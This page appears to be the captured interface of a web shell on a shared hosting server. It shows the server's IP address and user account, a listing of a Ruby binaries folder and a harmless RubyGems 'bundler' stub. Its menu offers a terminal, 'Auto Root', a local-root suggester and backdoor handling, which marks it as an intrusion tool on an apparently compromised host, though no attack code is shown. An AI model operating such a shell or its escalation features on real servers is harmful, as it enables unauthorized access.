Linux server165.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 68.65.122.53 & Your IP : 216.73.217.46
Domains :
Cant Read [ /etc/named.conf ]
User : vacazsti
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby40 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
bundle
570
B
-rwxr-xr-x
2026-04-24 16:08
bundler
572
B
-rwxr-xr-x
2026-04-24 16:08
erb
539
B
-rwxr-xr-x
2026-04-24 16:08
gem
260
B
-rwxr-xr-x
2026-04-24 16:08
rdoc
544
B
-rwxr-xr-x
2026-04-24 16:08
ri
540
B
-rwxr-xr-x
2026-04-24 16:08
ruby
7.96
KB
-rwxr-xr-x
2026-04-24 16:08
syntax_suggest
594
B
-rwxr-xr-x
2026-04-24 16:08
Save
Rename
#!/opt/alt/ruby40/bin/ruby # # This file was generated by RubyGems. # # The application 'bundler' is installed as part of a gem, and # this file is here to facilitate running it. # require 'rubygems' version = ">= 0.a" str = ARGV.first if str str = str.b[/\A_(.*)_\z/, 1] if str and Gem::Version.correct?(str) version = str ENV['BUNDLER_VERSION'] = str ARGV.shift end end if Gem.respond_to?(:activate_and_load_bin_path) Gem.activate_and_load_bin_path('bundler', 'bundle', version) else load Gem.activate_bin_path('bundler', 'bundle', version) end